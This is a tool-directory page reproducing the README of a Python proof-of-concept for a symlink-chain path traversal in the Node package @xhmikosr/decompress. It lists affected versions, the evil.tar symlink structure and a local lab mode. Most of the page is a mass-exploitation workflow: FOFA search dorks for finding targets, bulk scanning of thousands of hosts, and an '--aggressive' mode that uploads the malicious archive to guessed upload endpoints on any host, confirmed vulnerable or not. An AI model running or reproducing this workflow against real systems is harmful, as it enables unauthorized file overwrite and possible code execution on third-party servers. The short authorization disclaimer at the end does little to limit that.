Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-101894 — Python PoC for CVE-2026-101894: symlink-chain path traversal in @xhmikosr/decompress. Includes local Node lab, lockfile version scan, and mass evil.tar upload exploit. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-101894
ReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationScripting & AutomationWeb Application ExploitationInformation GatheringPenetration TestingSupply Chain Security
GitHubmurrez/cve-2026-101894

CVE-2026-101894

4 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Python PoC for CVE-2026-101894: symlink-chain path traversal in @xhmikosr/decompress. Includes local Node lab, lockfile version scan, and mass evil.tar upload exploit.

View Repository

CVE-2026-101894 — @xhmikosr/decompress symlink-chain path traversal

Python 3 PoC for CVE-2026-101894 — Node.js archive extraction in @xhmikosr/decompress (and unmaintained decompress) allows read/write outside the output directory via a chain of symlink entries. Bypass of CVE-2026-53486 hardening. CVSS 3.1 9.1 Critical.

PoCbithttps://pocbit.org/pocs/cve-2026-101894
Cataloghttps://pocbit.org/pocs/
Package@xhmikosr/decompress (maintained), decompress (kevva, unpatched)
APIDefault decompress(input, output)
CWECWE-22 path traversal, CWE-59 link following
Fixed10.2.2 (10.x), 11.1.4 (11.x)
GHSAGHSA-hrh2-vp3x-79xf

Vulnerability summary (Türkçe)

decompress, tar/zip vb. arşivleri hedef klasöre açarken lexical path kontrolleri uygular; ancak ardışık symlink girdileri ile kernel, sonraki girdileri çıktı dizini dışında çözebilir. Saldırgan kontrollü arşivle config, startup script veya hassas dosyaların üzerine yazabilir / okuyabilir → RCE senaryosu (CI, container, upload+extract servisleri).

@xhmikosr/decompress için yama: 10.2.2 ve 11.1.4. Eski decompress paketi 4.2.1’e kadar aynı sınıfta ve yama almıyor — @xhmikosr/[email protected]+’e geçin.


What this PoC does

ModePurpose
--lablab/ içinde 11.1.3 kurar, evil.tar symlink zinciri ile dışarı yazmayı doğrular
--write-evil-tarPayload arşivini diske yazar (POCBIT-101894-ESCAPED marker)
checkUzak hedefte package.json / lockfile → sürüm ≤ riskli mi?
exploitSymlink-chain evil.tar ile yaygın upload yollarına POST (mass bulk)
mass--list + -j; hits.txt / exploited.txt

Uzak exploit, sunucunun arşivi gerçekten decompress ile açtığını kanıtlamaz; 2xx upload kabulü + zayıf sürüm fingerprint’i exploited sayılır. Kesin kanıt için --lab.

hits.txt vs exploited.txt (sık görülen durum)

AşamaNe kanıtlar
check → hits.txt/package.json veya /package-lock.json açık ve içinde zayıf decompress var
exploit → exploited.txtPoC’nin denediği genel upload URL’lerinden en az biri HTTP 2xx döndü

FOFA Express listesinde 500 scan → 2 hit normaldir. 2 hit + 0 exploit (vulnerable_dep_no_upload_endpoint) da normaldir: bağımlılık sızıntısı ≠ herkese açık arşiv upload. Bu CVE istismar için uygulamanın untrusted arşivi decompress() ile açması gerekir; HID / rastgele :8088 sitelerinde PoC’nin 8–11 varsayılan path’i çoğu zaman yoktur.

# Zincir kanıtı (lokal)
python poc.py --lab

# Hit’ler: sadece bağımlılık + upload denemesi
python poc.py --list hits.txt --mode exploit -j 2
# Beklenen: upload_ok=0, status vulnerable_dep_no_upload_endpoint

Affected versions

PackageVulnerablePatched
@xhmikosr/decompress 11.x11.0.0 – 11.1.3≥ 11.1.4
@xhmikosr/decompress 10.x< 10.2.2≥ 10.2.2
decompress (kevva)≤ 4.2.1none — migrate

Requirements

cd CVE-2026-101894
pip install -r requirements.txt

Lab: Node.js + npm on PATH (Linux/macOS recommended for symlink extract behavior).


Usage

Local lab (recommended proof)

python poc.py --lab
python poc.py --write-evil-tar evil.tar

Remote check

python poc.py -u https://app.example --mode check
python poc.py --list targets.example.txt --mode check -j 30 --vuln-list hits.txt

Remote exploit (mass)

python poc.py -u https://app.example --mode exploit --aggressive
python poc.py --list hits.txt --mode exploit -j 10 --aggressive --upload-paths /api/upload,/upload
FlagMeaning
--labLocal Node extraction PoC
--aggressiveExploit even without exposed vulnerable lockfile
--upload-pathsCustom comma-separated POST paths
--exploited-listTargets where upload returned 2xx

evil.tar structure (concept)

Symlink chain (simplified):

  1. a/b/c/up → ../..
  2. a/b/escape → c/up/../..
  3. esc → ..
  4. Regular files …/pocbit_escape.txt with marker payload

Matches the symlink-chain bypass class described in 11.1.4 release notes (realpath / containment fix).


Mass workflow

FOFA JSON → python _format_fofa.py fofa_results_1000.json
           → fofa_results_1000.json (url), fofa_results_1000.csv, fofa_targets_1000.txt

python poc.py --list fofa_targets_1000.txt --mode check -j 40  → hits.txt
python poc.py --list fofa_results_1000.csv --mode check -j 40   # url column
python poc.py --list hits.txt --mode exploit -j 8 --aggressive  → exploited.txt

Upload/zip FOFA dork listesi (fofa_results_1000) exploit yüzeyi için Express-only 500 listesinden daha uygundur; yine de hit = lockfile + zayıf decompress, exploit = upload 2xx.


FOFA / discovery (Node apps)

body="node_modules/@xhmikosr/decompress"
body="\"decompress\"" && body="package-lock.json"
header="X-Powered-By: Express" && body="/package.json"

(Lockfile rarely public in prod; check often finds staging, CI artifacts, misconfigured static hosting.)


References

  • PoCbit CVE-2026-101894
  • CVE.report
  • v11.1.4 release
  • Prior: CVE-2026-53486 / GHSA-mp2f-45pm-3cg9

Legal

Test only systems you are authorized to assess. Do not upload malicious archives to third-party production services.


GitHub repository description

CVE-2026-101894 PoC: @xhmikosr/decompress symlink-chain archive path traversal (bypass CVE-2026-53486). Node lab + lockfile scan + mass evil.tar upload exploit. CVSS 9.1. https://pocbit.org/pocs/cve-2026-101894
Download Tool